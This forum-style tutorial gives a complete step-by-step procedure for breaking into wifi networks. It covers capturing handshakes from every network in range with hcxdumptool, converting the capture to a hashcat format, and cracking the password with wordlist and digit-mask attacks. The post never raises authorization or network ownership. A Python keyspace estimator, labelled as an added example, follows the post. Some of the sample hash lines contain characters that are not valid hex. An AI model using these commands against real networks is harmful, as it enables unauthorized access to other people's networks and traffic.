
Hacking wifi, a quick and dirty hcx tutorial

I saw a post yesterday about hacking wifi networks using airmon-ng. I still use airmon sometimes, but if we use hcxdumptool instead then we don't need to mess around with deauths/active clients and such.
hcxdumptool is a packet capture tool that grabs everything you need from every wifi network in range with very little user input. It comes preinstalled on some Linux systems; otherwise you can get it from git (https://github.com/ZerBea/hcxdumptool).
First install the tool if you don't already have it:
git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool
Install some dependencies and compile:
sudo apt-get install pkg-config libcurl4-openssl-dev libssl-dev zlib1g-dev
make
sudo make install
Let's use the tool. As with airmon-ng, your wifi adapter needs to be in monitor mode; hcx switches it for you automatically, but you still need to bring your network services down first (the equivalent of airmon-ng's "check kill"):
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
Run (where wlan0 is your wifi adapter, you can check this with 'sudo iwconfig'):
sudo hcxdumptool -i wlan0 -o dump.pcapng --active_beacon --enable_status=1
Let the tool run for at least a few minutes, or hours if you like; it keeps capturing until you press ctrl+c to quit. You will see lots of status lines like this:
09:07:43 1 553ad66cea23 d474607eace6 TP-MSG4 [EAPOL:M1M2ROGUE EAPOLTIME:1428 RC:64844 KDV:2]
Above, the tool has found an Access Point "TP-MSG4" with mac address "d4:74:60:7e:ac:e6", which is the one we want in this demo. Let's convert the dump file into a hash file that hashcat can crack:
hcxpcapngtool -o hash.hc22000 -E essidlist dump.pcapng
We now have a hash file. Open it in your favorite text editor and you will see one row per captured AP:
WPA*02*36ee008s471e593cfab67fde83a848b0*000effbfaf61*535cd63cea23*42542.......
WPA*02*bd93afd121f253063fdc496d6f425c94*0c8d323cd459*18s7s75e933e*42542......
WPA*02*c1740829541159a3042761165737666f*d474607eace6*543ad52csa24*42542....
You can see that the last row has our AP (mac d474607eace6). Delete the other lines from the file and save it; your hash is now ready to be cracked.
Example:
hashcat -m 22000 hash.hc22000 wordlist.txt [you're telling hashcat it's a WPA attack (22000), the file to crack and your wordlist]
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d [here we are choosing "attack mode 3" which is bruteforce, and specifying to try a combination of 8 digits]
And there you have it: hashcat will run your attack and try to crack the password. You can change the mask charsets (?l is a lowercase letter instead of ?d for a digit, for example) or use --increment to specify a min/max password length, and so on. I heavily recommend reading hashcat's excellent wiki (https://hashcat.net/wiki/doku.php?id=hashcat) to learn more about the different attacks and built-in rulesets.
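The 8-digit mask above is only 10^8 candidates, which is why purely numeric wifi passwords fall so quickly. Below is an added example (not from the post, and not hashcat's own code) that estimates the keyspace of any hashcat mask, with and without --increment, so you can see how a longer or non-numeric passphrase changes the picture; the hash rate in it is a constructed placeholder, not a measured figure.

```python
import math

# Added example, not from the original post. Sizes of hashcat's built-in
# charsets: ?l lowercase, ?u uppercase, ?d digits, ?s 33 printable symbols,
# ?a all 95 printable ASCII, ?b any byte.
CHARSET_SIZES = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95, "b": 256}


def parse_mask(mask):
    """Candidate count per position: '?x' is a charset, '??' a literal '?',
    anything else a fixed literal character."""
    sizes, i = [], 0
    while i < len(mask):
        if mask[i] != "?":
            sizes.append(1)
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        sel = mask[i + 1]
        if sel == "?":
            sizes.append(1)
        elif sel in CHARSET_SIZES:
            sizes.append(CHARSET_SIZES[sel])
        else:
            raise ValueError(f"unknown charset ?{sel}")
        i += 2
    return sizes


def keyspace(mask, increment=False, min_len=1):
    """Candidates for a mask. increment=True mirrors hashcat --increment:
    every prefix of the mask from min_len up to its full length is tried."""
    sizes = parse_mask(mask)
    if not increment:
        return math.prod(sizes)
    return sum(math.prod(sizes[:n]) for n in range(min_len, len(sizes) + 1))


def days_to_exhaust(mask, rate_per_second, increment=False, min_len=1):
    """Worst-case time to try every candidate at a given rate, in days."""
    return keyspace(mask, increment, min_len) / rate_per_second / 86400


if __name__ == "__main__":
    RATE = 500_000  # constructed placeholder hash rate for mode 22000
    for m in ("?d?d?d?d?d?d?d?d", "?l?l?l?l?l?l?l?l", "?a?a?a?a?a?a?a?a"):
        print(f"{m}: {keyspace(m):,} candidates, "
              f"{days_to_exhaust(m, RATE):.1f} days at {RATE:,} H/s")
```

Swap in your own measured rate from hashcat's benchmark to get realistic numbers for a given password policy.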